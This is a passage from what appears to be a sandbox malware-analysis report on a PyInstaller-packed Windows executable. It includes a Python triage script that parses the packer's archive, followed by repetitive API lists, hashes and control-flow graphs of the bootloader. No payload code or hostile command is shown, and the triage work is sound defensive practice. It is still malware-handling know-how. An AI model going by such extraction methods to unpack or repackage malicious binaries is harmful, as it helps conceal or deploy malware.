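                        "kind": TYPECODES.get(typecode, "unknown"),
                        "offset": archive_start + off, "compressed": clen,
                        "uncompressed": ulen, "zlib": bool(cflag)})
        pos += entry_len
    return cookie, entries


def extract_entry(data, entry):
    """Return the decompressed bytes of one TOC entry."""
    raw = data[entry["offset"]:entry["offset"] + entry["compressed"]]
    return zlib.decompress(raw) if entry["zlib"] else raw


def entry_scripts(data):
    """Names of the 's' entries in run order; the last one is usually the payload."""
    parsed = list_toc(data)
    return [] if parsed is None else [e["name"] for e in parsed[1] if e["type"] == b"s"]


def build_pkg(entries, pylib=b"python312.dll", pyver=312):
    """Assemble a minimal PKG (blobs, TOC, cookie) laid out like PyInstaller's.
    Used only to produce the constructed sample below."""
    blobs, toc = b"", b""
    for name, typecode, payload, compress in entries:
        blob = zlib.compress(payload) if compress else payload
        name_b = name.encode() + b"\x00"
        entry_len = TOC_ENTRY_LEN + len(name_b)
        entry_len += (-entry_len) % 16             # bootloader pads entries to 16 bytes
        name_b = name_b.ljust(entry_len - TOC_ENTRY_LEN, b"\x00")
        toc += struct.pack(TOC_ENTRY_FMT, entry_len, len(blobs), len(blob), len(payload),
                           int(compress), typecode) + name_b
        blobs += blob
    pkg_len = len(blobs) + len(toc) + COOKIE_LEN
    return blobs + toc + struct.pack(COOKIE_FMT, COOKIE_MAGIC, pkg_len, len(blobs),
                                     len(toc), pyver, pylib)


# constructed sample: a fake bootloader stub followed by a four-entry PKG.
# Names are illustrative, not taken from the analysed binary.
MAIN_SCRIPT = b"import os\nprint('payload would run here')\n"
SAMPLE = b"MZ" + b"\x00" * 62 + b"<constructed bootloader stub>" + build_pkg([
    ("pyiboot01_bootstrap", b"s", b"# PyInstaller bootstrap\n", True),
    ("main", b"s", MAIN_SCRIPT, True),
    ("PYZ-00.pyz", b"z", b"PYZ\x00<constructed>", True),
    ("python312.dll", b"b", b"MZ<constructed dll>", False),
])

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    parsed = list_toc(blob)
    if parsed is None:
        sys.exit("no PyInstaller cookie found")
    for e in parsed[1]:
        print("%-24s %-18s %7d -> %7d bytes" % (e["name"], e["kind"], e["compressed"], e["uncompressed"]))
    print("entry scripts:", ", ".join(entry_scripts(blob)))
```

Run as python pyi_triage.py X9g8L63QGs.exe to list the real TOC. A cookie whose package length and TOC fit inside the file is a reliable packer signal even when, as here, the sample has been renamed; the 's' entries are the scripts the bootloader executes in order, and the bundled modules live in the PYZ entry, so the usual next step is to extract the last entry script and decompile it (it is marshalled bytecode for the Python version recorded in the cookie).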

Control-flow Graph
• Function 7ff7c26869d4 (basic blocks 7ff7c26869d4-7ff7c2686dc2); the block graph with executed/not-executed colouring is rendered in the original report. API calls reached from the graph: CreateFileW, GetFileType, GetLastError, CloseHandle.
APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: bf498a22dbfba0db295f622562c6cd6d45920bef7404c585b36de946709df130
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: 7CC1C232B28A41C5EB10EFA5D4906AC7762F749BA8B414235DFAEA7BD4CF78D451C320

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C266841B
• RemoveDirectoryW.KERNEL32(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C266849E
• DeleteFileW.KERNELBASE(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C26684BD
• FindNextFileW.KERNELBASE(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C26684CB
• FindClose.KERNEL32(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C26684DC
• RemoveDirectoryW.KERNELBASE(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C26684E5
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction ID: f2a2d82894e5000b1a688513010d50cabaf49ddadbcbdda338003698ae722fa1
• Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction Fuzzy Hash: 33415F21A0CA4285EA20BF34E4445B9A372FB94764FC00232D5DDA6F95DFBCD54AC734
APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: 26e874244b118fc7e52b1032bab19fe5f4e87fb5eca4fdb226c006e1b1e6809b
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: 51F0A932619741C6F7609F60B448776A361AB44334F480235D9ED12BD4DF7CD058C724
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
• Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
• Instruction ID: 537833f7789efe433464049f8c43aa0ce690b3baae998321ba9228ea96b624f4
• Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
• Instruction Fuzzy Hash: 0D026B21A1D642C0FA65BF12A405279E692AF45FB0FC58A34DDDD66BD2DFBDA801C330

Control-flow Graph
• Function 7ff7c2661950 (basic blocks 7ff7c2661950-7ff7c2661c72); the block graph with executed/not-executed colouring is rendered in the original report. The graph shows only calls to internal subroutines (7ff7c26645b0, 7ff7c2667f80, 7ff7c2670744, 7ff7c267040c, 7ff7c2674f78, 7ff7c2662910, 7ff7c2674f98, 7ff7c2661c80, 7ff7c2674fb4, 7ff7c2670180, 7ff7c2662710, 7ff7c26700bc, 7ff7c266c5c0); the library calls it reaches through them are listed under APIs below.
APIs
  • Part of subcall function 00007FF7C2667F80: _fread_nolock.LIBCMT ref: 00007FF7C266802A
• _fread_nolock.LIBCMT ref: 00007FF7C2661A1B
  • Part of subcall function 00007FF7C2662910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C2661B6A), ref: 00007FF7C266295E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                    • Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                                                    • Instruction ID: 52920b5d223a19b39f35807706df03c52955b73872152158b9657cff46872b77
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF818071A08A82C5E720BF28D0442B9A3B2EB847A4F844431D9CDA7F85DEBCE545C774

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 407 7ff7c2661600-7ff7c2661611 408 7ff7c2661637-7ff7c2661651 call 7ff7c26645b0 407->408 409 7ff7c2661613-7ff7c266161c call 7ff7c2661050 407->409 414 7ff7c2661653-7ff7c2661681 call 7ff7c2674f78 call 7ff7c2662910 408->414 415 7ff7c2661682-7ff7c266169c call 7ff7c26645b0 408->415 416 7ff7c266162e-7ff7c2661636 409->416 417 7ff7c266161e-7ff7c2661629 call 7ff7c2662710 409->417 424 7ff7c266169e-7ff7c26616b3 call 7ff7c2662710 415->424 425 7ff7c26616b8-7ff7c26616cf call 7ff7c2670744 415->425 417->416 431 7ff7c2661821-7ff7c2661824 call 7ff7c26700bc 424->431 432 7ff7c26616f9-7ff7c26616fd 425->432 433 7ff7c26616d1-7ff7c26616f4 call 7ff7c2674f78 call 7ff7c2662910 425->433 441 7ff7c2661829-7ff7c266183b 431->441 435 7ff7c2661717-7ff7c2661737 call 7ff7c2674fb4 432->435 436 7ff7c26616ff-7ff7c266170b call 7ff7c2661210 432->436 446 7ff7c2661819-7ff7c266181c call 7ff7c26700bc 433->446 447 7ff7c2661739-7ff7c266175c call 7ff7c2674f78 call 7ff7c2662910 435->447 448 7ff7c2661761-7ff7c266176c 435->448 443 7ff7c2661710-7ff7c2661712 436->443 443->446 446->431 460 7ff7c266180f-7ff7c2661814 447->460 449 7ff7c2661802-7ff7c266180a call 7ff7c2674fa0 448->449 450 7ff7c2661772-7ff7c2661777 448->450 449->460 453 7ff7c2661780-7ff7c26617a2 call 7ff7c267040c 450->453 462 7ff7c26617da-7ff7c26617e6 call 7ff7c2674f78 453->462 463 7ff7c26617a4-7ff7c26617bc call 7ff7c2670b4c 453->463 460->446 468 7ff7c26617ed-7ff7c26617f8 call 7ff7c2662910 462->468 469 7ff7c26617be-7ff7c26617c1 463->469 470 7ff7c26617c5-7ff7c26617d8 call 7ff7c2674f78 463->470 475 7ff7c26617fd 468->475 469->453 472 7ff7c26617c3 469->472 470->468 472->475 475->449
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
• Instruction ID: 7127c338d8a0e7dddd06712ffc889ba19b6cb79ba9e7794e021fcc1681b29202
• Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
• Instruction Fuzzy Hash: C751AE61B08A4392EA10BF25A4101A9A362BF85BB4FC44531EECC67F92DFBCE555C374

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF7C2663CBB), ref: 00007FF7C26688F4
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF7C2663CBB), ref: 00007FF7C26688FA
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF7C2663CBB), ref: 00007FF7C266893C
  • Part of subcall function 00007FF7C2668A20: GetEnvironmentVariableW.KERNEL32(00007FF7C266388E), ref: 00007FF7C2668A57
  • Part of subcall function 00007FF7C2668A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C2668A79
  • Part of subcall function 00007FF7C26782A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C26782C1
  • Part of subcall function 00007FF7C2662810: MessageBoxW.USER32 ref: 00007FF7C26628EA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction ID: b98af2371c34f127faefef7cd65751ae17b00dd306a37cea4fda17f4c67935cc
• Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction Fuzzy Hash: E1418411B19A4280EA10FF35A8592B992B3AF95BA0FC04131ED8D67F96DEBCE504C375

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 599 7ff7c2661210-7ff7c266126d call 7ff7c266bdf0 602 7ff7c2661297-7ff7c26612af call 7ff7c2674fb4 599->602 603 7ff7c266126f-7ff7c2661296 call 7ff7c2662710 599->603 608 7ff7c26612d4-7ff7c26612e4 call 7ff7c2674fb4 602->608 609 7ff7c26612b1-7ff7c26612cf call 7ff7c2674f78 call 7ff7c2662910 602->609 615 7ff7c2661309-7ff7c266131b 608->615 616 7ff7c26612e6-7ff7c2661304 call 7ff7c2674f78 call 7ff7c2662910 608->616 621 7ff7c2661439-7ff7c266144e call 7ff7c266bad0 call 7ff7c2674fa0 * 2 609->621 619 7ff7c2661320-7ff7c2661345 call 7ff7c267040c 615->619 616->621 627 7ff7c266134b-7ff7c2661355 call 7ff7c2670180 619->627 628 7ff7c2661431 619->628 636 7ff7c2661453-7ff7c266146d 621->636 627->628 635 7ff7c266135b-7ff7c2661367 627->635 628->621 637 7ff7c2661370-7ff7c2661398 call 7ff7c266a230 635->637 640 7ff7c266139a-7ff7c266139d 637->640 641 7ff7c2661416-7ff7c266142c call 7ff7c2662710 637->641 642 7ff7c266139f-7ff7c26613a9 640->642 643 7ff7c2661411 640->643 641->628 645 7ff7c26613ab-7ff7c26613b9 call 7ff7c2670b4c 642->645 646 7ff7c26613d4-7ff7c26613d7 642->646 643->641 652 7ff7c26613be-7ff7c26613c1 645->652 647 7ff7c26613ea-7ff7c26613ef 646->647 648 7ff7c26613d9-7ff7c26613e7 call 7ff7c2689ea0 646->648 647->637 651 7ff7c26613f5-7ff7c26613f8 647->651 648->647 654 7ff7c266140c-7ff7c266140f 651->654 655 7ff7c26613fa-7ff7c26613fd 651->655 656 7ff7c26613c3-7ff7c26613cd call 7ff7c2670180 652->656 657 7ff7c26613cf-7ff7c26613d2 652->657 654->628 655->641 658 7ff7c26613ff-7ff7c2661407 655->658 656->647 656->657 657->641 658->619
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
• Instruction ID: 013edc6fe4290a9722309ce62581d231d2c44df3182eafa82d29c95cdecacf6e
• Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F151B622A08A4281EA60BF15A4503B9A2A2FF85BA4FC44135ED8D67FD5DFBCD541C734

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF7C267F11A,?,?,-00000018,00007FF7C267ADC3,?,?,?,00007FF7C267ACBA,?,?,?,00007FF7C2675FAE), ref: 00007FF7C267EEFC
• GetProcAddress.KERNEL32(?,?,?,00007FF7C267F11A,?,?,-00000018,00007FF7C267ADC3,?,?,?,00007FF7C267ACBA,?,?,?,00007FF7C2675FAE), ref: 00007FF7C267EF08
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction ID: 1d3a926de201ee0d4d687f0001a63605ba65e79d33c843646ef8ef2c80162d34
• Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction Fuzzy Hash: A141C321B19A0281FA15FF16A804575A392BF44BB0FD84539DD9DA7B94EFBCE408C370

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7C2663804), ref: 00007FF7C26636E1
• GetLastError.KERNEL32(?,00007FF7C2663804), ref: 00007FF7C26636EB
  • Part of subcall function 00007FF7C2662C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662C9E
  • Part of subcall function 00007FF7C2662C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662D63
  • Part of subcall function 00007FF7C2662C50: MessageBoxW.USER32 ref: 00007FF7C2662D99
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: 4133b74280d9d2b8651899db4c27cb38a9961711c748b40e9f9c750c72edb290
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 70217461B1864281FA20BF20E8543B59262BF94768FC00136D9DDA3FD5EEBCE515C338

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction ID: 50657baf3df4cdfbdea6d67b2f69fd4d24220e9b3d3ca57c05f04a0d927bd32c
• Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction Fuzzy Hash: 16C1832290868681E651BF25A4442BDE762EB81FA0FD54131EACE23BD1DFFCE855C770

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction ID: 3c2436c4bfcfe2d5826adfb53a900b1cea3a4164123b4c81f2bbafaf3c3eaf20
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17212621A0864281DA10AF65B454139E7B2FB857B0F900235D6ED53FE5DFBCD445C764

Control-flow Graph

APIs
  • Part of subcall function 00007FF7C2668760: GetCurrentProcess.KERNEL32 ref: 00007FF7C2668780
  • Part of subcall function 00007FF7C2668760: OpenProcessToken.ADVAPI32 ref: 00007FF7C2668793
  • Part of subcall function 00007FF7C2668760: GetTokenInformation.KERNELBASE ref: 00007FF7C26687B8
  • Part of subcall function 00007FF7C2668760: GetLastError.KERNEL32 ref: 00007FF7C26687C2
  • Part of subcall function 00007FF7C2668760: GetTokenInformation.KERNELBASE ref: 00007FF7C2668802
  • Part of subcall function 00007FF7C2668760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7C266881E
  • Part of subcall function 00007FF7C2668760: CloseHandle.KERNEL32 ref: 00007FF7C2668836
• LocalFree.KERNEL32(?,00007FF7C2663C55), ref: 00007FF7C266916C
• LocalFree.KERNEL32(?,00007FF7C2663C55), ref: 00007FF7C2669175
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
